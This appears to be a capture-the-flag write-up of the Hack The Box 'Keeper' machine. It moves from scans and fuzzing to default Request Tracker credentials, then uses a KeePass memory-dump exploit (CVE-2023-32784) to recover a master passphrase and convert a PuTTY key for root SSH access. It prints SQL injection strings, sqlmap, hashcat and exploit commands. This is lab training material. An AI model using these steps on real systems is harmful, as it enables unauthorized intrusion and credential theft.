# Lessons Learned - Google default creds for web apps - Look in every nook and cranny for disclosures/creds when we get access to an admin panel --- # # After-Action Attack Sequence - BLUF: Thorough pillaging of `Request Tracker` admin panel; Keepass dump file exploit; Convert PuTTY privkey to openssh - Access admin panel to Best Practical Request Tracker ver. 4.4.4 with default creds - Find creds for `lnorgaard` buried within admin panel - Find keepass db and dump file in `/home/lnorgaard` - Google for way to abuse Keepass 2.x dump file > `CVE-2023-32784` - Use python version of `CVE-2023-32784` poc, to uncover a partial passphrase to the keepass db - Google the partial match to find a Danish desert with ø characters - Use `kpcli` to open the keepass db with the above passphrase - Find a PuTTY privkey in `.ppk` format - Clean up `.ppk` and use `puttygen` to convert to openssh format - SSH connect as `root` --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260417192328.png]] - `nmap` scan - light ![[images/Pasted image 20260417192348.png]] - `nmap` scan - detailed ![[images/Pasted image 20260417192456.png]] - `nmap` scan - UDP ![[images/Pasted image 20260417194611.png]] --- # Service Enum ## Port 80 (HTTP): nginx 1.18.0 ### `keeper.htb` - visit page ![[images/Pasted image 20260417192624.png]] - source ![[images/Pasted image 20260417192643.png]] - `request:response` ![[images/Pasted image 20260417192719.png]] ### `tickets.keeper.htb/rt` - Add to `/etc/hosts` - Visit page > Request Tracker ver. 4.4.4 ![[images/Pasted image 20260417193009.png]] - source ![[images/Pasted image 20260417193249.png]] - Here we see `/rt/NoAuth/Login.html` - `request:response` ![[images/Pasted image 20260417193400.png]] - We have a cookie - test with blank login ![[images/Pasted image 20260417194033.png]] - Maybe the `next` parameter is an encoded IDOR vector? ### Fuzzing - Directory fuzzing ![[images/Pasted image 20260417201541.png]] - `/m/` for mobile > similar to `/rt/` ![[images/Pasted image 20260417193707.png]] - Potential SQLi ![[images/Pasted image 20260417193910.png]] ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://tickets.keeper.htb/FUZZ -c -ic -fs 0,95 ``` - Vhost fuzzing > nothing ![[images/Pasted image 20260417201657.png]] - Subdomain fuzzing > nothing ### SQLi - Manual SQLi tests > none of the below work ```bash admin' admin'-- - admin' OR 1=1 admin' OR 1=1-- - ``` - Run `sqlmap` with a POST request against `/rt` > nothing ```bash sqlmap -r request.txt --batch --dbms=mysql --technique=BEU --risk=3 --level=5 ``` ### Default Creds - `admin:admin` - `root:password` > from some Googling on request tracker 4.4.4 - We're in as `root` ![[images/Pasted image 20260417195623.png]] - There is one open ticket ![[images/Pasted image 20260417195749.png]] - crash dump of `keepass` attached to initial ticket, then removed by sysadmin - `lnorgaard` - and saved to their home dir - maybe we can load a script to get a revshell as wwwdata then crack the keepass db? - look for authenticated RCEs - no POCs found from Googling - `searchsploit` ![[images/Pasted image 20260417202409.png]] - Comment field for `lnorgaard` has a password ![[images/Pasted image 20260417203102.png]] --- # Shell as `lnorgaard` - `ssh` into target with creds for `lnorgaard` ![[images/Pasted image 20260417203238.png]] - let's exfil this ZIP, I assume its the keepass db ```bash scp [email protected]:/home/lnorgaard/RT30000.zip ~/Documents/htb/boxes/keeper/RT30000.zip ``` ![[images/Pasted image 20260417203542.png]] - Unzip and inspect ![[images/Pasted image 20260417203626.png]] ## Brute force `keepass` passphrase - Run `keepass2john` and attempt to crack with `-m 13400` ```bash keepass2john passcodes.kdbx > keepass.hash hashcat -m 13400 keepass.hash /opt/rockyou.txt ``` - This is taking too long - Let's Google: "keepass 2.x exploits" - Found CVE-2023-32784 which exploits a keepass 2.x dump file, which is what we have - https://github.com/vdohney/keepass-password-dumper uses .NET - https://github.com/matro7sh/keepass-dump-masterkey uses python - notes that the first character will be missing - https://github.com/ynuwenhof/keedump uses rust ## `CVE-2023-32784` .NET exploit - Install .NET ```bash wget https://packages.microsoft.com/config/debian/13/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.deb #install signing key rm packages-microsoft-prod.deb sudo apt-get update && sudo apt-get install -y dotnet-sdk-10.0 #.NET SDK sudo apt-get update && sudo apt-get install -y aspnetcore-runtime-10.0 #.NET runtime git clone https://github.com/vdohney/keepass-password-dumper cd ./keepass-password-dumper dotnet run ~/Documents/htb/boxes/keeper/KeePassDumpFull.dmp ``` - Looks like the POC is using .NET 7.0, but I downloaded 10.0 ![[images/Pasted image 20260417211347.png]] - Come back to this later if the rust and python versions do not work ## `CVE-2023-32784` rust exploit ```bash curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh sudo apt install cargo cargo install keedump git clone https://github.com/ynuwenhof/keedump.git cd keedump cargo install --path . echo "export PATH="$HOME/.cargo/bin:$PATH"" >> ~/.bashrc source ~/.bashrc echo $PATH #confirm keedump -i ~/Documents/htb/boxes/keeper/KeePassDumpFull.dmp ``` - Illegible ![[images/Pasted image 20260417205521.png]] ## `strings` - Way too many lines ![[images/Pasted image 20260417212022.png]] - Try to pipe into grep ![[images/Pasted image 20260417212031.png]] ## `CVE-2023-32784` python exploit - still getting a garbage output ![[images/Pasted image 20260417210213.png]] - Google the output > we see a Danish porridge with a unique character that was not displayed in the above output ![[images/Pasted image 20260417213007.png]] ## Open `.kdbx` with `kpcli` - Now download `kpcli` and open ```bash sudo apt install -y kpcli kpcli open passcodes.kdbx ``` - `passwords/Network` has 2 entries ![[images/Pasted image 20260417213752.png]] - Entry 0 has a hidden password and a PuTTY privkey ![[images/Pasted image 20260417213849.png]] - After some Googling, we can use `-f` to reverse the redaction - Use `su root` to privesc with the revealed password > fails ## Convert priv key from PuTTY to OpenSSH format - Now create a `.ppk` and clean it up ```bash sed 's/^ //g' key.ppk > key2.ppk ``` ![[images/Pasted image 20260418180629.png]] - Convert `.ppk` to openssh ```bash sudo apt-get install putty-tools puttygen key2.ppk -O private-openssh -o id_rsa #-O specifies the output format chmod 600 id_rsa ``` ![[images/Pasted image 20260418180836.png]] --- # Shell as `root` - Login as `root` with `id_rsa` ![[images/Pasted image 20260418180930.png]]